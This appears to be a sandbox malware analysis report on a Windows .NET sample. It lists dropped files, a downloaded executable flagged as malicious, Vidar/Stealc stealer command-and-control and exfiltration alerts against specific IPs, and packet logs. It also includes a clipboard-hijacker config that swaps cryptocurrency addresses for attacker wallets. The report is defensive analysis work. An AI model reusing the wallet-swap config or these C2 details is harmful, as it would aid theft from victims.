                                                                                                                SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                Malicious:false
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\7AeSqNv1rC.exe.log

                                                                                                                Download File
                                                                                                                Process:C:\Users\user\Desktop\7AeSqNv1rC.exe
                                                                                                                File Type:CSV text
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1281
                                                                                                                Entropy (8bit):5.370111951859942
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                                                                                                                MD5:12C61586CD59AA6F2A21DF30501F71BD
                                                                                                                SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                                                                                                                SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                                                                                                                SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                                                                                                                Malicious:true
                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\76561199780418869[1].htm

                                                                                                                Download File
                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3070), with CRLF, LF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):34889
                                                                                                                Entropy (8bit):5.399374344646687
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:768:6dpqme0Ih+3tAA6WG9OfcDAhTBv++nIjBtPF5zfJkPVoEAdLTBv++nIjBtPF5x2A:6d8me0Ih+3tAA6WG9OFhTBv++nIjBtP0
                                                                                                                MD5:FAB0C680FAA6339E9AAFF30674F712B4
                                                                                                                SHA1:6F04A1A318489654CFBB6FF9A59685E0E8FDD816
                                                                                                                SHA-256:516324F0382C81303DD4EC695A428526ECC2099A7B8705CC4B292B87E5484A47
                                                                                                                SHA-512:EADEC707A9C39B32CBB58593BC7E242447F400CECD80E458C7E5C06D2B4C78B1D079F95DC7118B209031E1499CB8966FF7C421A29F49E8286FB378CB5190583E
                                                                                                                Malicious:false
                                                                                                                Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: u55u https://49.12.106.214|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english" rel="stylesheet" type="text/css" >.<link hre

                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\clip[1].exe

                                                                                                                Download File
                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):519680
                                                                                                                Entropy (8bit):6.308273053673522
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:6144:paNY2RhksAZnFcHQgu6NRvBf03SJRvX2CRXZGS9PlUlAREoghgAOAw7hB1:cN5CsIFcHQHGRvVrL99PSoghgKwl
                                                                                                                MD5:6CA0B0717CFA0684963FF129ABB8DCE9
                                                                                                                SHA1:69FB325F5FB1FE019756D68CB1555A50294DD04A
                                                                                                                SHA-256:2500AA539A7A5AE690D830FAE6A2B89E26BA536F8751BA554E9F4967D48E6CFA
                                                                                                                SHA-512:48F9435CF0A17AED8FF4103FA4D52E9C56F6625331A8B9627B891A5CCADA14F14C2641AAC6A5C09570F26452E5416AC28B31FE760A3F8BA2F5FE9222D3C336EE
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                • Antivirus: ReversingLabs, Detection: 88%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........y...y...y..?.s..y..?.q..y..?.p..y..&'...y..&'...y..&'...y.......y...y...y..<'...y..<'...y..Rich.y..........PE..L...(..f.....................X.......H............@..........................@............@.....................................P................................B...{.............................. {..@...............x............................text............................... ..`.rdata..x...........................@..@.data....!..........................@....gfids..............................@..@.reloc...B.......D..................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nholman[1].htm

                                                                                                                Download File
                                                                                                                Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                File Type:JSON data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):280
                                                                                                                Entropy (8bit):5.680675858629041
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:6:3HuRgkfFeodNXJHvQ0VOFNhiXBrMFQk2hoqlb1Rmc7v:OkQJF0xUBYJuVF1wcD
                                                                                                                MD5:D3A095E8C8114A3FBD4E277976EFE21C
                                                                                                                SHA1:88C6D267492C69CDDF1FD7F70E782F05A0BBEB20
                                                                                                                SHA-256:F34C4133A70ADFAC9F94F5F33790806A3E3B5B26C0D658C9A80BCE2EC9DA6AA1
                                                                                                                SHA-512:D3DEAEE573A63AD19E5C1200B4D51BF58388CCC669105A272197470BA74F93FB264927956B61C52475A2048610C007E553786F7581FB20DBBECD59343214F918
                                                                                                                Malicious:false
                                                                                                                Preview:{.. "patterns": {.. "^((bc1[0-9A-Za-z]{32,64})|([13][a-km-zA-HJ-NP-Z1-9]{25,34}))$": "bc1qajmcwhljrvvhzh7gvj9llvjqu0muv08nzr2pdd",.. "^0x[a-fA-F0-9]{40}$": "0xE10E0C9cbD9415B587c294ACa2082c562DC649ed",.. "T[A-Za-z1-9]{33}": "TUT6xRHgJVLan3FWEeavPjvPGnVsm9GG67".. }..}..

                                                                                                                C:\Users\user\AppData\Local\Temp\delays.tmp

                                                                                                                Download File
                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1048575
                                                                                                                Entropy (8bit):0.0
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:7:7
                                                                                                                MD5:43A1B333A5D6F6C84E6F6A4F28B5C2C5
                                                                                                                SHA1:02C7CDB94BE185EFC03954C2E24738CFAA691C2D
                                                                                                                SHA-256:9C3F7AD82D80541327FB6987168F02D9160A4A737F67101DA2123E9A4EBEB4AA
                                                                                                                SHA-512:049BE239A5C3DE5DF953A8F6A42A2C9DD8D388A7D9BA0277CB0F46F7E23DC8D8B88D2A337F00091BCC0D10AB0ED0C1DA8F73B7D40B99D319E9A4D17B72652BBE
                                                                                                                Malicious:false
                                                                                                                Preview:FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF

                                                                                                                Static File Info

                                                                                                                General

                                                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                Entropy (8bit):7.628032874941183
                                                                                                                TrID:
                                                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                                • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                • Windows Screen Saver (13104/52) 0.07%
                                                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                File name:7AeSqNv1rC.exe
                                                                                                                File size:608'256 bytes
                                                                                                                MD5:f275736a38a6b90825076e8d786ad5c5
                                                                                                                SHA1:c0d862ceab728736580f043316cdc099b2ab8924
                                                                                                                SHA256:b48eeab60494eb44d8d5ef10a87fd46ad1aa33fdcf7245efb636f69f2fd55f42
                                                                                                                SHA512:b6662ee0426b45c5629808718613a687808deeaca692bb00d26ac5c9098b8a36a126ef80eca470db085aa5a84e38a9ee088a165cea821bf1226055a4fd842711
                                                                                                                SSDEEP:12288:Z23Df42FsPVesttHjpBKBmtvoYTjapYQIhtud8FpowFgXRo:Sz4xDTHt/tgYTjJQ0pXowWXR
                                                                                                                TLSH:8BD438E7B2C1DA9AC8D1CA74F49302F9036D9F87CD54925BD60CFE8E39B81866A47311
                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....W-..........."...0......R........... ... ....@.. ....................................@................................

                                                                                                                File Icon

                                                                                                                Icon Hash:45a18c9696969c63

                                                                                                                Static PE Info

                                                                                                                General

                                                                                                                Entrypoint:0x491396
                                                                                                                Entrypoint Section:.text
                                                                                                                Digitally signed:false
                                                                                                                Imagebase:0x400000
                                                                                                                Subsystem:windows gui
                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                Time Stamp:0xB52D572E [Wed Apr 28 02:32:14 2066 UTC]
                                                                                                                TLS Callbacks:
                                                                                                                CLR (.Net) Version:
                                                                                                                OS Version Major:4
                                                                                                                OS Version Minor:0
                                                                                                                File Version Major:4
                                                                                                                File Version Minor:0
                                                                                                                Subsystem Version Major:4
                                                                                                                Subsystem Version Minor:0
                                                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                Entrypoint Preview

                                                                                                                Instruction
                                                                                                                jmp dword ptr [00402000h]
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al

                                                                                                                Data Directories

                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x913440x4f.text
                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x920000x4f4c.rsrc
                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x980000xc.reloc
                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x913280x1c.text
                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                Sections

                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                .text0x20000x8f39c0x8f4007a6bd0c3e8a888f0050d6a8b86ec6c9bFalse0.7787293439136126data7.623939353720136IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                .rsrc0x920000x4f4c0x5000913ad93970d837a98a9d365703d975eaFalse0.9373046875data7.797308905282344IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                .reloc0x980000xc0x200dfc7922e346a5d168a08a16e96dab062False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                Resources

                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                RT_ICON0x921000x4891PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9897722990795069
                                                                                                                RT_GROUP_ICON0x969a40x14data1.05
                                                                                                                RT_VERSION0x969c80x384data0.4066666666666667
                                                                                                                RT_MANIFEST0x96d5c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                                                Imports

                                                                                                                DLLImport
                                                                                                                mscoree.dll_CorExeMain

                                                                                                                Network Behavior

                                                                                                                Suricata IDS Alerts

                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                2024-10-08T04:59:37.752997+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44974249.12.106.214443TCP
                                                                                                                2024-10-08T04:59:38.916623+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44974349.12.106.214443TCP
                                                                                                                2024-10-08T04:59:40.295762+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44974449.12.106.214443TCP
                                                                                                                2024-10-08T04:59:41.646972+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44974549.12.106.214443TCP
                                                                                                                2024-10-08T04:59:42.331574+02002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config149.12.106.214443192.168.2.449745TCP
                                                                                                                2024-10-08T04:59:42.993948+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44974649.12.106.214443TCP
                                                                                                                2024-10-08T04:59:43.686214+02002049087ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST1192.168.2.44974649.12.106.214443TCP
                                                                                                                2024-10-08T04:59:43.686243+02002051831ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1149.12.106.214443192.168.2.449746TCP
                                                                                                                2024-10-08T04:59:44.408957+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44974749.12.106.214443TCP
                                                                                                                2024-10-08T04:59:45.421774+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44974849.12.106.214443TCP
                                                                                                                2024-10-08T04:59:48.358591+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44974949.12.106.214443TCP
                                                                                                                2024-10-08T04:59:49.452342+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44975049.12.106.214443TCP
                                                                                                                2024-10-08T04:59:50.461923+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44975149.12.106.214443TCP
                                                                                                                2024-10-08T04:59:51.554296+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44975249.12.106.214443TCP
                                                                                                                2024-10-08T04:59:52.582976+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44975349.12.106.214443TCP
                                                                                                                2024-10-08T04:59:54.335990+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44975449.12.106.214443TCP
                                                                                                                2024-10-08T04:59:55.978719+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44975649.12.106.214443TCP
                                                                                                                2024-10-08T04:59:57.531571+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44975749.12.106.214443TCP
                                                                                                                2024-10-08T04:59:59.016134+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44976449.12.106.214443TCP
                                                                                                                2024-10-08T05:00:00.287265+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44977549.12.106.214443TCP
                                                                                                                2024-10-08T05:00:03.370299+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44979349.12.106.214443TCP
                                                                                                                2024-10-08T05:00:04.549674+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44980249.12.106.214443TCP
                                                                                                                2024-10-08T05:00:05.905361+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44981249.12.106.214443TCP
                                                                                                                2024-10-08T05:00:07.445567+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44982249.12.106.214443TCP
                                                                                                                2024-10-08T05:00:09.361394+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44983549.12.106.214443TCP
                                                                                                                2024-10-08T05:00:11.344325+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44984749.12.106.214443TCP
                                                                                                                2024-10-08T05:00:14.613134+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44986849.12.106.214443TCP
                                                                                                                2024-10-08T05:00:14.868528+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.449874185.215.113.11780TCP
                                                                                                                2024-10-08T05:00:16.152280+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44988249.12.106.214443TCP
                                                                                                                2024-10-08T05:00:17.634663+02002054495ET MALWARE Vidar Stealer Form Exfil1192.168.2.44989145.132.206.25180TCP

                                                                                                                Network Port Distribution

                                                                                                                TCP Packets

                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                Oct 8, 2024 04:59:35.558307886 CEST49741443192.168.2.4104.102.49.254
                                                                                                                Oct 8, 2024 04:59:35.558372021 CEST44349741104.102.49.254192.168.2.4
                                                                                                                Oct 8, 2024 04:59:35.558444023 CEST49741443192.168.2.4104.102.49.254
                                                                                                                Oct 8, 2024 04:59:35.563311100 CEST49741443192.168.2.4104.102.49.254
                                                                                                                Oct 8, 2024 04:59:35.563344955 CEST44349741104.102.49.254192.168.2.4
                                                                                                                Oct 8, 2024 04:59:36.238945961 CEST44349741104.102.49.254192.168.2.4
                                                                                                                Oct 8, 2024 04:59:36.239162922 CEST49741443192.168.2.4104.102.49.254
                                                                                                                Oct 8, 2024 04:59:36.285550117 CEST49741443192.168.2.4104.102.49.254
                                                                                                                Oct 8, 2024 04:59:36.285626888 CEST44349741104.102.49.254192.168.2.4
                                                                                                                Oct 8, 2024 04:59:36.286510944 CEST44349741104.102.49.254192.168.2.4
                                                                                                                Oct 8, 2024 04:59:36.286607027 CEST49741443192.168.2.4104.102.49.254
                                                                                                                Oct 8, 2024 04:59:36.291840076 CEST49741443192.168.2.4104.102.49.254
                                                                                                                Oct 8, 2024 04:59:36.335479021 CEST44349741104.102.49.254192.168.2.4
                                                                                                                Oct 8, 2024 04:59:36.728399992 CEST44349741104.102.49.254192.168.2.4
                                                                                                                Oct 8, 2024 04:59:36.728456020 CEST44349741104.102.49.254192.168.2.4
                                                                                                                Oct 8, 2024 04:59:36.728502035 CEST44349741104.102.49.254192.168.2.4
                                                                                                                Oct 8, 2024 04:59:36.728502035 CEST49741443192.168.2.4104.102.49.254
                                                                                                                Oct 8, 2024 04:59:36.728575945 CEST44349741104.102.49.254192.168.2.4
                                                                                                                Oct 8, 2024 04:59:36.728621960 CEST49741443192.168.2.4104.102.49.254
                                                                                                                Oct 8, 2024 04:59:36.728621960 CEST49741443192.168.2.4104.102.49.254
                                                                                                                Oct 8, 2024 04:59:36.728651047 CEST49741443192.168.2.4104.102.49.254
                                                                                                                Oct 8, 2024 04:59:36.830641985 CEST44349741104.102.49.254192.168.2.4
                                                                                                                Oct 8, 2024 04:59:36.830667019 CEST44349741104.102.49.254192.168.2.4
                                                                                                                Oct 8, 2024 04:59:36.830802917 CEST49741443192.168.2.4104.102.49.254
                                                                                                                Oct 8, 2024 04:59:36.830868006 CEST44349741104.102.49.254192.168.2.4
                                                                                                                Oct 8, 2024 04:59:36.830935001 CEST49741443192.168.2.4104.102.49.254
                                                                                                                Oct 8, 2024 04:59:36.835983992 CEST44349741104.102.49.254192.168.2.4
                                                                                                                Oct 8, 2024 04:59:36.836076021 CEST44349741104.102.49.254192.168.2.4
                                                                                                                Oct 8, 2024 04:59:36.836165905 CEST49741443192.168.2.4104.102.49.254
                                                                                                                Oct 8, 2024 04:59:36.836165905 CEST49741443192.168.2.4104.102.49.254
                                                                                                                Oct 8, 2024 04:59:36.836304903 CEST49741443192.168.2.4104.102.49.254
                                                                                                                Oct 8, 2024 04:59:36.836347103 CEST44349741104.102.49.254192.168.2.4
                                                                                                                Oct 8, 2024 04:59:36.845704079 CEST49742443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:36.845753908 CEST4434974249.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:36.845834017 CEST49742443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:36.846051931 CEST49742443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:36.846072912 CEST4434974249.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:37.752762079 CEST4434974249.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:37.752996922 CEST49742443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:37.756177902 CEST49742443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:37.756234884 CEST4434974249.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:37.756671906 CEST4434974249.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:37.756853104 CEST49742443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:37.757082939 CEST49742443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:37.799443007 CEST4434974249.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:38.241929054 CEST4434974249.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:38.242098093 CEST4434974249.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:38.242163897 CEST49742443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:38.242165089 CEST49742443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:38.245017052 CEST49742443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:38.245080948 CEST4434974249.12.106.214192.168.2.4
